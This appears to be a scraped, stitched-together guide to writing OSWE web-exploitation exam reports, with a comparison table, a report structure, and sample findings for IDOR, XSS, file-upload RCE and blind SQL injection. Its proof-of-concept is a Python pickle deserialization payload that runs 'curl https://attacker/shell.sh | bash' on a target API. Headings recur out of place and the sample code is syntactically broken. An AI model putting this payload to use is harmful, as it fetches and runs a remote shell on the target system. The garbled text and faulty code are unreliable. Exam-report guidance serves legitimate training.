Oswe Exam Report Work [work] Info

Part 1: The Philosophical Shift (OSWE vs. OSCP)

| Aspect | OSCP (Penetration Testing) | OSWE (Web Expert) | | :--- | :--- | :--- | | Target | Black box | White/grey box (source code given) | | Proof | Screenshot of whoami / ifconfig | Code snippet + HTTP request demonstrating logic flaw | | Difficulty | Finding the vulnerability | Exploiting a chain of minor bugs to get RCE | | Report Enemy | Forgetting a screenshot | Missing the code context |

Your mantra for OSWE: "If it isn't in the source code, it didn't happen."

OSWE Exam Report – Excerpt

Proof of Concept

import base64, pickle
class Exploit:
    def __reduce__(self):
        import os; return (os.system, ('curl https://attacker/shell.sh | bash',))

payload = base64.b64encode(pickle.dumps(Exploit()))
requests.post('http://target/api/verify', json='token': payload)

Mistake #2: Missing Source Code References

The error: "I found an SQLi in the search bar."
The fix: "In search.php lines 12-15, the code concatenates $_GET['q'] directly into the query. See Appendix A for the full source dump."

OSWE-01: Pre-Auth RCE via PHP Type Juggling + Deserialization

File: modules/api/AuthController.php:112-119 Severity: Critical

Executive Summary

Provide a concise overview (3–5 sentences) summarizing the objective, scope, key findings, and overall outcome (pass/fail). Example:
The objective was to identify and exploit web application vulnerabilities on the assigned target to achieve remote code execution and obtain proof-of-exploit flags. During the exam I identified multiple injection and authentication issues, chained an authorization bypass to remote code execution, and captured the required flags. Result: Pass. oswe exam report work

Vulnerability Identification

List each vulnerability with title, risk rating, affected endpoint(s), and brief evidence.

  1. Insecure Direct Object Reference (IDOR) — High

    • Endpoint: GET /api/v1/users/id
    • Evidence: Accessing /api/v1/users/2 returned private details of user 2 while authenticated as user 3.
    • PoC: curl -H "Authorization: Bearer [token_user3]" https://[target]/api/v1/users/2

  2. Reflected Cross-Site Scripting (XSS) — Medium Part 1: The Philosophical Shift (OSWE vs

    • Endpoint: /search?q=
    • Evidence: Injected payload alert(1) reflected and executed in response.

  3. Unrestricted File Upload → Remote Code Execution (RCE) — Critical

    • Endpoint: /uploads/upload.php
    • Evidence: Application allowed uploading PHP files; uploaded webshell executed.
    • PoC steps and artifact: (detailed below)

  4. SQL Injection (Blind) — High

    • Endpoint: /api/v1/items?filter=
    • Evidence: Boolean-based responses changed with payloads; admin credentials enumerated partially.

Structure (recommended order)

  1. Cover page — Exam title, target IP/hostname, testing window, candidate name (if required).
  2. Executive summary (1–2 paragraphs) — Scope, high-level findings, overall success (e.g., achieved RCE on app X), and remediation priority.
  3. Scope & methodology — Targets in-scope, exclusions, tools used, testing types (manual review, source review, fuzzing), and proof constraints.
  4. Credentials & setup — How you accessed the lab (lab creds, VM setup), environment notes, and any non-standard configs.
  5. Walkthrough / Findings — One finding per section, ordered by impact. For each:
    • Title (concise)
    • Impact (brief)
    • Prerequisites (auth, files, environment)
    • Discovery steps (numbered, reproducible)
    • Exploitation steps (numbered, with commands/payloads)
    • Proof (screenshots, command output)
    • Remediation (practical fix)
  6. Full exploit script / final payload — Include the final working exploit script, with usage instructions and any dependencies.
  7. Appendices
    • Raw notes and alternate attempts
    • Tool output (burpsuite logs, request/response with headers)
    • Useful commands and one-liners
    • References

6. Tools Used (Keep it minimal)